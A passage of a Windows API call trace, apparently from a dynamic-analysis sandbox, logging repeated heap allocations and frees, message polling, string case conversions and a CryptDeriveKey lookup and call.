| out: hHeap=0x25c0000) returned 1 [0256.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0256.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0256.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0256.126] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0256.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0256.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0256.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0256.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0256.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0256.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0256.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0256.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0256.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0256.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1a0 | out: hHeap=0x25c0000) returned 1 [0256.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0256.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0256.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0256.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0256.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0256.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0256.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0256.127] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0256.128] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0256.128] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0256.128] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0256.128] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0256.128] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0256.128] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0256.128] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0256.128] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0256.128] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0256.128] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0256.128] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0256.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0256.128] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0256.128] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0256.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0256.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0256.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0256.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0256.128] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0256.129] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0256.129] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0256.129] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0256.129] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0256.129] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0256.129] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0256.129] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0256.129] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0256.129] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0256.129] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0256.129] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0256.129] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0256.129] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0256.129] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.129] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0256.129] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0256.129] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0256.129] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0256.129] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0256.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0256.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0256.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0256.130] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0256.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0256.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0256.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa0f8 [0256.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0256.130] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0256.130] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0256.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0256.130] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0256.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0256.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0256.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0256.130] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0256.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0256.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0256.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0256.131] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0256.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0256.131] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0256.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0256.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0256.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0256.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0256.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0256.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0256.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0256.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0256.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0256.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0256.131] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0256.132] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0256.132] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0256.132] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0256.132] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0256.132] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0256.132] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0256.132] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0256.132] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0256.132] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0256.132] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0256.132] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0256.132] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0256.132] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0256.132] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0256.132] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0256.132] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0256.132] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0256.133] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0256.133] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0256.133] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0256.133] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0256.133] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0256.133] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0256.133] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0256.133] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0256.133] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0256.133] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0256.133] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0256.133] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0256.133] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0256.133] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0256.133] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0256.133] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0256.134] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0256.134] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0256.134] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0256.134] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0256.134] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0256.134] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0256.134] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0256.134] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0256.134] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0256.134] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0256.134] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0256.134] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0256.134] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0256.134] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0256.134] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0256.134] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0256.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0256.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0256.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0256.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0256.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0256.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0256.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0256.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0256.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0256.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0256.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0256.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0256.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0256.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0256.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0256.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0256.135] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0256.136] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0256.136] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x24a9c90, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0256.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0256.136] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDeriveKey") returned 0x74d83188 [0256.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0256.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0256.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466df0 [0256.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0256.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0256.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0256.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0256.136] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0256.136] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0256.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0256.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0256.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0256.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0256.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0256.143] CryptDeriveKey (in: hProv=0xad2698, Algid=0x6601, hBaseData=0xaa5960, dwFlags=0x1, phKey=0x8bef50 | out: phKey=0x8bef50*=0xaa5860) returned 1 [0256.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0256.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0256.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0256.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0256.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0256.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0256.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0256.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0256.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0256.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0256.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0256.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0256.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0256.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0256.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0256.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0256.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0256.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0256.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0256.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0256.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0256.144] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0256.144] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0256.144] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0256.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0256.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0256.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0256.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0256.144] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0256.144] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0256.144] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0256.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0256.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0256.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0256.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0256.144] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0256.144] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0256.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0256.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0256.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0256.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0256.145] RtlAllocateHeap 